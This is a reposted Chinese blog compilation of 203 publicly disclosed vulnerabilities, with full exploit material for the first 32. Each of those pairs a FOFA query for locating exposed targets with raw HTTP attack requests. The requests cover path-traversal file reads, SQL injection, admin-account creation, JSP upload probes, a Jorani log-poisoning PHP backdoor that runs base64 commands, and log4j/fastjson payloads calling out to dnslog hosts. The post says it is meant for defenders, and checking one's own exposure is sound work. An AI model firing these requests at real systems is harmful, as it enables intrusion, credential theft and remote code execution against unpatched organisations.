
Compilation of Publicly Disclosed Internet Vulnerabilities 202309-202406 (repost)

Posted on 2024-6-5 14:31:29

Compilation of Publicly Disclosed Internet Vulnerabilities 202309-202406
道一安全, 2024-06-05 07:41, Beijing
The following article is from 网络安全新视界, author 网络安全新视界.

Purpose: exploitation of N-day vulnerabilities makes up a large share of attacks in offensive and defensive security operations, and this article is meant to help defenders. Defenders can use its contents to check their own exposure.

Vulnerability sources: this article covers 203 high-impact vulnerability POCs publicly disclosed in China and abroad between September 2023 and May 2024. All of them were collected from other public accounts or websites on the internet and were compiled and published by the 网络安全新视界 team.

Security patches: all of the vulnerabilities are already public; for patches or remediation guidance, please contact the product vendor.

Content: because of length limits, a few overly long POCs are replaced with the word PAYLOAD; search for the complete POC yourself if you need it.

Legal rights: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the backend to have the relevant content removed.


Statement

To keep things simple and easy to browse, there is no "reply to see the full list". This article is the most complete version to date; when using it, press F12 and search for keywords.

Bookmark this article if you find it useful. You can also follow this public account (网络安全新视界).


Contents

01

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR smart edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. 鸿运 proactive safety monitoring cloud platform arbitrary file download
8. Phicomm router RCE
9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. Hongfan (红帆) iOffice ioFileDown arbitrary file read
14. jshERP (华夏ERP) sensitive information disclosure
15. jshERP (华夏ERP) getAllList information disclosure
16. Hongfan (红帆) HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT management platform arbitrary file read
21. Dahua ICC intelligent IoT management platform random remote code execution
22. Dahua ICC intelligent IoT management platform log4j remote code execution
23. Dahua ICC intelligent IoT management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPTech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特脸爱云 one-face-pass smart management platform 1.0.55.0.0.1 permission bypass
66. Wanhu ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Tosei (Japan) self-service laundry machine RCE
87. 安恒明御 security gateway aaa_local_web_preview file upload
88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. Qi An Xin 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. Qi An Xin 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD smart recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress Plugin HTML5 Video Player SQL injection
112. WordPress Plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. Aiohttp path traversal
127. Glodon (广联达) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 云商城 file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立迅 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. 天维尔 firefighting and rescue dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 operating system command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical imaging archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully automated parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园(安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益价值管理系统 (lean value management system) DownLoad.aspx arbitrary file read
168. Hongjing (宏景) EHR OutputCode arbitrary file read
169. Hongjing (宏景) EHR downlawbase SQL injection
170. Hongjing (宏景) EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. Jinher (金和) OA C6 FileDownLoad.aspx arbitrary file read
175. Jinher (金和) OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewer system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. Esafenet (亿赛通) electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone (山石网科) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 (Aliyun Drive) WebDAV command injection
199. cockpit assetsmanager_upload interface file upload
200. SeaCMS dmku SQL injection
201. Founder (方正) omnimedia news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

POC list

02

1. StarRocks MPP database unauthorized access
FOFA:title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA:title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR smart edge gateway userlist information disclosure
FOFA:title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA:title="EasyCVR"

Change password to the MD5 of your own password
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA:title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. Sangfor NGAF arbitrary file read
FOFA:title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运 proactive safety monitoring cloud platform arbitrary file download
FOFA:body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. Phicomm router RCE
FOFA:icon_hash="-1344736688"
Log in to the admin backend with the default account admin, then perform the following
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step 1>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
FOFA:app="Doccms"
GET /search/index.php?keyword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
Host: x.x.x.x

The payload is the following statement, double URL-encoded

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
FOFA:icon_hash="953405444"

After the upload, the response contains the path of the uploaded file
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA:title="Jorani"
Step 1: obtain the cookie first
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

POST request: the function is executed with base64 encoding
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor


Send the following request to the lab target to execute the id command; the value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= in the request header is the base64-encoded command string
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. Hongfan (红帆) iOffice ioFileDown arbitrary file read
FOFA:app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip


14. jshERP (华夏ERP) sensitive information disclosure
FOFA:body="jshERP-boot"
The leaked content includes usernames and passwords
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. jshERP (华夏ERP) getAllList information disclosure
CVE-2024-0490
FOFA:body="jshERP-boot"
The leaked content includes usernames and passwords
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. Hongfan (红帆) HFOffice 医微云 SQL injection
FOFA:title="HFOffice"
The POC calls a function to compute the MD5 of 1234
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua DSS itcBulletin SQL injection
FOFA:app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
<s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA:app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA:app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. Dahua ICC intelligent IoT management platform arbitrary file read
FOFA:body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. Dahua ICC intelligent IoT management platform random remote code execution
FOFA:icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}

22. Dahua ICC intelligent IoT management platform log4j remote code execution
FOFA:icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}

23. Dahua ICC intelligent IoT management platform fastjson remote code execution
FOFA:icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
       {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog


26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8


28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--


/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--


31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded


32. Yonyou NC complainbilldetail SQL injection
version= NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
